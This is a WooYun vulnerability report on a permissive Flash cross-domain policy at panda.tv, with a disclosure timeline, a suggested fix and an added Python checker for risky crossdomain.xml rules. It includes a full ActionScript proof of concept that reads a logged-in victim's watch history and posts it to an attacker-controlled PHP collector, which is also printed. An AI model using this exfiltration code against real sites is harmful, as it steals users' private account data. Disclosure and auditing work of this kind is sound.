WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-12-23: Details reported to the vendor, awaiting the vendor's response
2015-12-24: Vendor confirmed the issue; details disclosed to the vendor only
2016-01-03: Details disclosed to core white hats and domain experts
2016-01-13: Details disclosed to regular white hats
2016-01-23: Details disclosed to intern white hats
2016-02-06: Details disclosed to the public
http://www.panda.tv/crossdomain.xml is misconfigured. Because the Flash cross-domain policy is too permissive, a SWF served from an attacker-controlled domain can make the victim's browser fetch authenticated panda.tv pages with the victim's cookies and read the response (a CSRF-style cross-domain read), which exposes sensitive information. For example, http://www.panda.tv/watchhistory returns the logged-in user's watch history, and other account pages can be read the same way. PoC:
// Author: Gursev Singh Kalra ([email protected])
// XDomainXploit.as
// Thanks - http://help.adobe.com/en_US/as3/dev/WS5b3ccc516d4fbf351e63e3d118a9b90204-7cfd.html#WS5b3ccc516d4fbf351e63e3d118a9b90204-7cf5
package {
    import flash.display.Sprite;
    import flash.events.*;
    import flash.net.URLRequestMethod;
    import flash.net.URLRequest;
    import flash.net.URLLoader;

    public class XDomainXploit extends Sprite {
        public function XDomainXploit() {
            // Target URL from where the data is to be retrieved.
            // The victim's browser attaches its panda.tv cookies, and the
            // permissive crossdomain.xml lets this SWF read the response.
            var readFrom:String = "http://www.panda.tv/watchhistory";
            var readRequest:URLRequest = new URLRequest(readFrom);
            var getLoader:URLLoader = new URLLoader();
            getLoader.addEventListener(Event.COMPLETE, eventHandler);
            try {
                getLoader.load(readRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }

        private function eventHandler(event:Event):void {
            // URL to which retrieved data is to be sent (attacker's collector).
            var sendTo:String = "http://xxxxxx/baike.php";
            var sendRequest:URLRequest = new URLRequest(sendTo);
            sendRequest.method = URLRequestMethod.POST;
            sendRequest.data = event.target.data;
            var sendLoader:URLLoader = new URLLoader();
            try {
                sendLoader.load(sendRequest);
            } catch (error:Error) {
                trace("Error loading URL: " + error);
            }
        }
    }
}
baike.php
<?php
// Collector: appends whatever the SWF POSTs (the victim's watch-history page) to a file.
$data = file_get_contents("php://input");
$ret = file_put_contents('/tmp/panda.html', $data, FILE_APPEND | LOCK_EX);
if ($ret === false) {
    die('Error writing to file');
} else {
    echo "$ret bytes written to file";
}
?>
Have a logged-in panda.tv user open http://xxx.xxx.xxx.xxx/XDomainXploit.swf; the SWF reads the watch-history page and posts it to baike.php.
Suggested fix: a secure crossdomain.xml configuration, allowing access only from the specific trusted domains that need it rather than a wildcard.
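The report above shows the exploitation side but not the policy file itself. As an added example (not part of the original WooYun report, and not panda.tv's actual crossdomain.xml, which the page does not reproduce), the following Python checker parses a Flash cross-domain policy and flags the settings that let a SWF from any origin read authenticated responses: a wildcard allow-access-from, secure="false", a site-control mode of "all", and wildcard allow-http-request-headers-from. The two embedded policies are constructed, one permissive and one hardened to the site's own hosts; the trusted suffix panda.tv is an assumption made for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed example of a dangerously permissive policy (illustration only,
# not the file that was actually served by www.panda.tv).
PERMISSIVE_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="all"/>
  <allow-access-from domain="*" secure="false"/>
  <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
"""

# Constructed example of a hardened policy that trusts only the site's own hosts.
HARDENED_POLICY = """<?xml version="1.0"?>
<cross-domain-policy>
  <site-control permitted-cross-domain-policies="master-only"/>
  <allow-access-from domain="www.panda.tv" secure="true"/>
  <allow-access-from domain="*.panda.tv" secure="true"/>
</cross-domain-policy>
"""


def _is_trusted(domain, trusted_suffixes):
    """True if domain (optionally starting with a '*.' label) stays under a trusted suffix.

    '*.panda.tv' and 'www.panda.tv' are accepted for suffix 'panda.tv';
    '*.tv', '*panda.tv' and 'evil.example' are not.
    """
    host = domain.lower()
    for suffix in trusted_suffixes:
        suffix = suffix.lower()
        if host == suffix or host.endswith("." + suffix):
            return True
    return False


def audit_crossdomain(xml_text, trusted_suffixes=("panda.tv",)):
    """Return a list of findings for a crossdomain.xml body; empty means no risky rule.

    trusted_suffixes lists domains the site owns (assumed here to be panda.tv).
    The secure attribute is treated as defaulting to "true"; Flash only defaults
    it that way for policies served over HTTPS, so plain-HTTP policies get the
    benefit of the doubt here.
    """
    findings = []
    root = ET.fromstring(xml_text)
    if root.tag != "cross-domain-policy":
        return ["root element is %r, not cross-domain-policy" % root.tag]

    for sc in root.findall("site-control"):
        if sc.get("permitted-cross-domain-policies", "") == "all":
            findings.append('site-control permitted-cross-domain-policies="all": any XML '
                            "a user can upload to this host can act as a policy file")

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if domain == "*":
            findings.append('allow-access-from domain="*": a SWF on any origin can read '
                            "authenticated responses using the victim's cookies")
        elif not _is_trusted(domain, trusted_suffixes):
            findings.append("allow-access-from domain=%r is outside the trusted suffixes %r"
                            % (domain, list(trusted_suffixes)))
        if rule.get("secure", "true").lower() == "false":
            findings.append('allow-access-from domain=%r has secure="false": an http:// SWF '
                            "may read https:// content" % domain)

    for rule in root.findall("allow-http-request-headers-from"):
        if rule.get("domain") == "*":
            findings.append('allow-http-request-headers-from domain="*": any origin may send '
                            "custom request headers to this site")
    return findings


if __name__ == "__main__":
    for name, policy in (("permissive", PERMISSIVE_POLICY), ("hardened", HARDENED_POLICY)):
        print("%s policy:" % name)
        for finding in audit_crossdomain(policy) or ["no risky rules"]:
            print("  -", finding)
```

Run against a live target by fetching https://target/crossdomain.xml and passing the body to audit_crossdomain with the target's own suffixes; the wildcard finding is the one that makes a PoC like XDomainXploit work, while the hardened policy produces no findings.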
Severity: Low
Vulnerability Rank: 1
Confirmed: 2015-12-24 14:52
Panda has already improved this issue; thanks to the white hat for the support!
None yet